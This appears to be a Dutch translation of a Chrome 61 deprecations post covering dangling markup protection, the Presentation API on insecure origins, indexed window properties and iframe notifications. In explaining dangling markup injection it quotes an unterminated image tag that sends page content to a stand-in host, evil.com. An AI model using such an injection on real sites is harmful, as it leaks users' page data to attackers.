In bijna elke versie van Chrome zien we een aanzienlijk aantal updates en verbeteringen aan het product, de prestaties ervan en ook de mogelijkheden van het webplatform. In dit artikel worden de beëindigingen en verwijderingen beschreven van Chrome 61, dat vanaf 3 augustus in bèta is. Deze lijst kan op elk moment worden gewijzigd.
Beveiliging en privacy
Blokkeer bronnen waarvan de URL's de tekens '\n' en '<' bevatten
Er bestaat een vorm van hacken die bungelende markup-injectie wordt genoemd, waarbij een ingekorte URL wordt gebruikt om gegevens naar een extern eindpunt te verzenden. Beschouw bijvoorbeeld een pagina met <img src='https://evil.com/? . Omdat de URL geen afsluitend aanhalingsteken bevat, lezen browsers door naar het volgende aanhalingsteken en behandelen de ingesloten tekens alsof het één URL betreft.
Chrome 61 verhelpt dit beveiligingslek door de tekensets te beperken die zijn toegestaan in de href en src attributen. Chrome stopt met name met het verwerken van URL's als er nieuwe regeltekens ( \n ) en minder dan tekens ( < ) worden aangetroffen.
Ontwikkelaars met een legitiem gebruik van een nieuwe regel en minder dan tekens in een URL moeten in plaats daarvan aan deze tekens ontsnappen.
Intentie om te verwijderen | Chromestatustracker | Chroombug
Beëindig en verwijder de Presentation API in onveilige contexten
Het is gebleken dat op onveilige oorsprongen de Presentatie-API kan worden gebruikt als een hackvector op onveilige oorsprongen. Omdat beeldschermen geen adresbalken hebben, kan de API worden gebruikt om inhoud te vervalsen. Het is ook mogelijk om gegevens uit de lopende presentatie te exfiltreren.
In lijn met het voornemen van Blink om krachtige functies op onveilige oorsprongen te verwijderen , zijn we van plan de ondersteuning voor de Presentation API in onveilige contexten af te schaffen en te verwijderen. Vanaf Chrome 61 werkt PresentationRequest.start() niet langer op onveilige oorsprongen.
Intentie om te verwijderen | Chromestatustracker | Chroombug
JavaScript
Het definiëren van geïndexeerde eigenschappen in vensters is niet toegestaan
Voorheen stonden sommige browsers JavaScript-toewijzingen toe, zoals de volgende:
window[0] = 1;
De huidige HTML-specificatie merkt op dat dit een expliciete schending van de JavaScript-specificatie is. Als zodanig is deze mogelijkheid verwijderd in Chrome 61. Vanaf februari 2016 voldoet Firefox al aan de regelgeving.
Verwijder het gebruik van meldingen van onveilige iframes
Toestemmingsverzoeken van iframes kunnen gebruikers in verwarring brengen, omdat het moeilijk is om onderscheid te maken tussen de oorsprong van de pagina die de pagina bevat en de oorsprong van het iframe dat het verzoek doet. Wanneer de reikwijdte van het verzoek onduidelijk is, is het voor gebruikers moeilijk om te beoordelen of ze toestemming moeten verlenen of weigeren.
Als u meldingen in iframes niet toestaat, worden de vereisten voor toestemming voor meldingen ook op één lijn gebracht met die voor pushmeldingen, waardoor de wrijving voor ontwikkelaars wordt verminderd.
Ontwikkelaars die deze functionaliteit nodig hebben, kunnen een nieuw venster openen om toestemming voor meldingen aan te vragen.
Intentie om te verwijderen | Chromestatustracker | Chroombug